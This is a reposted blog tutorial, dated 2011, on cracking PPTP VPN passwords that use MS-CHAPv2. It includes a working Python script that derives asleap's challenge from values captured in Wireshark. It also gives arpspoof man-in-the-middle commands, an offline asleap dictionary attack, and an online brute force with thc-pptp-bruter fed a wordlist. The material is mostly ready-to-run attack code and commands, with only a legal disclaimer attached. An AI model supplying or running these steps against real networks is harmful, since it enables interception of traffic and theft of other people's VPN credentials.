Monday, September 12, 2011

HOWTO : Cracking PPTP VPNs with asleap and THC-pptp-bruter

*** Do NOT attack any computer or network without authorization, or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

The original post is here


Watch on-line
Download Video
Script

What is this?

A python script, to automatically generate the arguments for Joshua Wright's 'asleap' program.

This video demonstrates an offline attack (asleap) and an online attack (THC-pptp-bruter) against a software PPTP VPN that authenticates with MS-CHAPv2.

How does this work?

With Wireshark (and a Man In The Middle attack, so the victim's PPP traffic passes through your machine) you can capture the "CHAP Challenge" and "CHAP Response" fields of the MS-CHAPv2 exchange. These values break down as follows:

CHAP Challenge = Authenticator Challenge (16 bytes)
CHAP Response  = Peer Challenge (16 bytes) + Reserved (8 bytes, all zero) + NT-Response, i.e. the Peer Response (24 bytes) + Flags (1 byte); 49 bytes in total

Concatenate the Peer Challenge, the Authenticator Challenge and the username (in that order), SHA1 the result and keep the first 8 bytes. This 8-byte value is the "Challenge" that the 24-byte NT-Response was actually computed against (the NT-Response is that challenge DES-encrypted three times under the user's NT password hash).

Once we have that 8-byte challenge, we feed it into asleap together with the 24-byte NT-Response, and asleap tries candidate passwords offline until one reproduces the captured response.

This script does all that work for you (and more); it only needs the two values from Wireshark. It also offers different styles of attack: you can either use a dictionary/wordlist directly, or use asleap's 'genkeys' to pre-generate a lookup file of hashes (recommended, since the expensive part is then done once and re-used). It can also run asleap with the generated arguments automatically.
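The challenge-derivation step described above, as an added example (my own code, not g0tmi1k's script): it splits the two Wireshark values from the page's own command line into their MS-CHAPv2 fields, computes the 8-byte challenge and prints the asleap arguments. Assumed, not stated on the page: the 49-byte Response layout and the SHA1 truncation follow RFC 2759, asleap's -C/-R options take colon-delimited hex bytes and -W names the wordlist (as in asleap's usage text), and the wordlist path is a placeholder.

```python
"""Derive asleap's -C/-R arguments from the MS-CHAPv2 values seen in Wireshark.

Added example, not g0tmi1k's script. Assumptions (RFC 2759, asleap usage text):
  CHAP Challenge  = 16-byte Authenticator Challenge
  CHAP Response   = PeerChallenge(16) | Reserved(8) | NT-Response(24) | Flags(1)
  Challenge fed to asleap = SHA1(PeerChallenge | AuthChallenge | UserName)[:8]
"""
import hashlib
import sys

# Values copied from the page's example command line.
USERNAME = "g0tmi1k"
CHAP_CHALLENGE_HEX = "3fb0e397540e8aa3df5eb08b0053092c"
CHAP_RESPONSE_HEX = (
    "df7661696051401f7192726630558ac2"                  # Peer Challenge
    "0000000000000000"                                  # Reserved (must be zero)
    "3c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec6"  # NT-Response
    "00"                                                # Flags
)


def parse_chap_response(response_hex):
    """Split the 49-byte MS-CHAPv2 Response field into its components."""
    raw = bytes.fromhex(response_hex.replace(":", ""))
    if len(raw) != 49:
        raise ValueError("MS-CHAPv2 Response must be 49 bytes, got %d" % len(raw))
    if raw[16:24] != b"\x00" * 8:
        raise ValueError("Reserved field is not zero; this is not an MS-CHAPv2 response")
    return {
        "peer_challenge": raw[0:16],
        "nt_response": raw[24:48],
        "flags": raw[48],
    }


def challenge_hash(peer_challenge, auth_challenge, username):
    """RFC 2759 ChallengeHash(): first 8 bytes of
    SHA1(PeerChallenge || AuthenticatorChallenge || UserName).
    The NT-Response was computed against this value, so it is asleap's challenge."""
    if len(peer_challenge) != 16 or len(auth_challenge) != 16:
        raise ValueError("both challenges must be 16 bytes")
    h = hashlib.sha1()
    h.update(peer_challenge)
    h.update(auth_challenge)
    h.update(username.encode("ascii"))  # bare user name: no domain, no NUL terminator
    return h.digest()[:8]


def colon_hex(data):
    """asleap takes its byte values colon-delimited (e.g. 3f:b0:e3:...)."""
    return ":".join("%02x" % b for b in data)


def asleap_args(username, chap_challenge_hex, chap_response_hex, wordlist="wordlist.txt"):
    """Build the asleap command line for an offline dictionary attack.
    `wordlist` is a placeholder path; with a genkeys-generated hash file you would
    pass -f/-n instead of -W."""
    auth_challenge = bytes.fromhex(chap_challenge_hex.replace(":", ""))
    if len(auth_challenge) != 16:
        raise ValueError("CHAP Challenge must be 16 bytes")
    parts = parse_chap_response(chap_response_hex)
    chal = challenge_hash(parts["peer_challenge"], auth_challenge, username)
    return ["asleap", "-C", colon_hex(chal),
            "-R", colon_hex(parts["nt_response"]), "-W", wordlist]


if __name__ == "__main__":
    # Usage: python chap2asleap.py [username chap_challenge_hex chap_response_hex]
    user, chal, resp = (sys.argv[1:4] if len(sys.argv) == 4
                        else (USERNAME, CHAP_CHALLENGE_HEX, CHAP_RESPONSE_HEX))
    print(" ".join(asleap_args(user, chal, resp)))
```

Run it with no arguments to see the command asleap would be given for the page's capture; the Reserved-field check is there because a Response of the wrong length or with non-zero padding usually means the wrong packet (or a plain MS-CHAPv1 exchange) was copied out of Wireshark.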

What do I need?

The script -

Name: asleap
Version: 2.2
Home Page:
Download Link:

Name: THC-pptp-bruter
Version: 0.1.4
Home Page:
Download Link:

Version: 0.1.1
Home Page:
Download Link:

How to use
1.) chmod 755
2.) python


# Let the attacking box forward traffic, so the MITM does not break the victim's connection
echo 1 > /proc/sys/net/ipv4/ip_forward

# ARP-poison both sides (victim and gateway; targets omitted here) so the PPTP traffic passes through eth1
arpspoof -i eth1 -t

arpspoof -i eth1 -t

# Capture the PPP CHAP packets and copy the "CHAP Challenge" and "CHAP Response" values
wireshark -i eth1 -k

# Offline attack: hand the username, CHAP Challenge (-c) and CHAP Response (-r) to the script
python -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v

# Online attack: pipe a wordlist into thc-pptp-bruter (-n parallel tries, -l guesses per second limit;
# the target VPN server's address goes at the end of the command)
cd /pentest/passwords/wordlists
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999

That's all! See you.